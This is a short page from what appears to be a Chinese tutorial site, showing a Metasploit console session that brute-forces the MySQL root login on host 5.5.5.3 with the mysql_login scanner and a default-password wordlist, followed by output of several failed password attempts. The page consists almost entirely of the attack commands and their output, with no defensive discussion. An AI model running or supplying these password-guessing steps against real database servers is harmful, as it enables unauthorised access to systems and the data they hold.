当前位置:Gxlcms > 数据库问题 > metasploit爆破mysql

metasploit爆破mysql

时间:2021-07-01 10:21:17 帮助过:23人阅读

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set RHOSTS 5.5.5.3

RHOSTS => 5.5.5.3

msf auxiliary(mysql_login) > set USERNAME root

USERNAME => root

msf auxiliary(mysql_login) > set PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt

PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt

  msf auxiliary(mysql_login) > exploit
[*] 5.5.5.3:3306 MYSQL – Found remote MySQL version 5.5.16
[*] 5.5.5.3:3306 MYSQL – [1/7] – Trying username:’root’ with password:”
[*] 5.5.5.3:3306 MYSQL – [1/7] – failed to login as ‘root’ with password ”
[*] 5.5.5.3:3306 MYSQL – [2/7] – Trying username:’root’ with password:’root’
[*] 5.5.5.3:3306 MYSQL – [2/7] – failed to login as ‘root’ with password ‘root’
[*] 5.5.5.3:3306 MYSQL – [3/7] – Trying username:’root’ with password:’tiger’
[*] 5.5.5.3:3306 MYSQL – [3/7] – failed to login as ‘root’ with password ‘tiger’ [*] 5.5.5.3:3306 MYSQL – [4/7] – Trying username:’root’ with password:’postgres’

metasploit爆破mysql

标签:rem   gre   username   efault   exp   scanner   ann   def   name   

人气教程排行